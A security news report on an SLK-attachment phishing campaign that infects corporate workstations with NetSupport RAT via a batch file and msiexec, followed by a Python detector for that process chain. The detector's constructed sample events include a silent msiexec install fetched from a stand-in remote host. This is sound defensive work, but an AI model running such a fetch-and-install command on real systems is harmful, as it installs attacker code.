Researchers at MalwareHunterTeam have discovered a new phishing campaign targeting at least 13 companies, some of them very well known. The campaign uses SLK (Symbolic Link) file attachments, a format that Microsoft Excel uses to share data between spreadsheets. The emails are sent from accounts that try to impersonate clients or company vendors.

If an employee opens the SLK file and clicks the “Enable Content” button as instructed by the attackers, commands in the SLK file cause Excel to save a .BAT (batch) file to the %TEMP% folder and execute it. The batch file uses msiexec.exe to download an installer file from a remote server and install malware. Once the installer has been executed, the employee’s workstation is infected with NetSupport RAT.

Access to corporate networks is a potential goldmine for attackers: it would allow them to steal corporate secrets and financial documents, launch ransomware attacks, and carry out a multitude of other damaging attacks.

The 13 companies that were originally targeted are:
- A2B Australia Limited
- Asarco LLC
- AusNet Services
- Bega Cheese
- Boc Group Inc
- Glad Products Company
- Hasbro
- Hydratight
- Iridium
- Messer LLC
- MutualBank
- Pact Group
- Sappi North America
On February 17th, MalwareHunterTeam reported yet another company, Beach Energy Limited, targeted by the same attack. It is likely that more major companies across multiple industry segments will continue to be targeted as long as the attack technique is effective.
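
The execution chain described above (Excel running a .BAT file from %TEMP%, which then calls msiexec.exe against a remote server) can be hunted in process-creation telemetry. The following is an added example, not part of MalwareHunterTeam's report; the event field names, sample events and host names are constructed assumptions.

```python
import re

# Constructed events, not real telemetry; field names and hosts are assumptions.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "cmdline": r'EXCEL.EXE "C:\Users\amy\Downloads\invoice.slk"'},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\amy\AppData\Local\Temp\a1.bat"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://installer.example.invalid/pkg.msi /q"},
    # Benign controls: local MSI install, and a URL install not descended from Excel.
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Installers\vpn-client.msi"'},
    {"pid": 500, "ppid": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i https://deploy.example.invalid/agent.msi"},
]

URL_RE = re.compile(r"https?://", re.I)
TEMP_BAT_RE = re.compile(r'\\temp\\[^"\\]+\.bat\b', re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def ancestors(event, by_pid):
    """Yield parent, grandparent, ... (assumes PIDs are unique within the batch)."""
    seen = set()
    while event["ppid"] in by_pid and event["ppid"] not in seen:
        seen.add(event["ppid"])
        event = by_pid[event["ppid"]]
        yield event

def detect(events):
    """Flag msiexec.exe fetching from a URL when Excel is an ancestor process."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["image"]) != "msiexec.exe" or not URL_RE.search(e["cmdline"]):
            continue
        chain = list(ancestors(e, by_pid))
        if not any(basename(a["image"]) == "excel.exe" for a in chain):
            continue
        # A batch file run from a Temp folder in the chain matches the reported behaviour.
        via_bat = any(TEMP_BAT_RE.search(a["cmdline"]) for a in chain)
        alerts.append({"pid": e["pid"], "severity": "high" if via_bat else "medium",
                       "cmdline": e["cmdline"]})
    return alerts

if __name__ == "__main__":
    print(detect(EVENTS))
```

Only the msiexec.exe process descended from Excel is flagged; the two control installs are ignored, which keeps routine software deployment out of the alert queue.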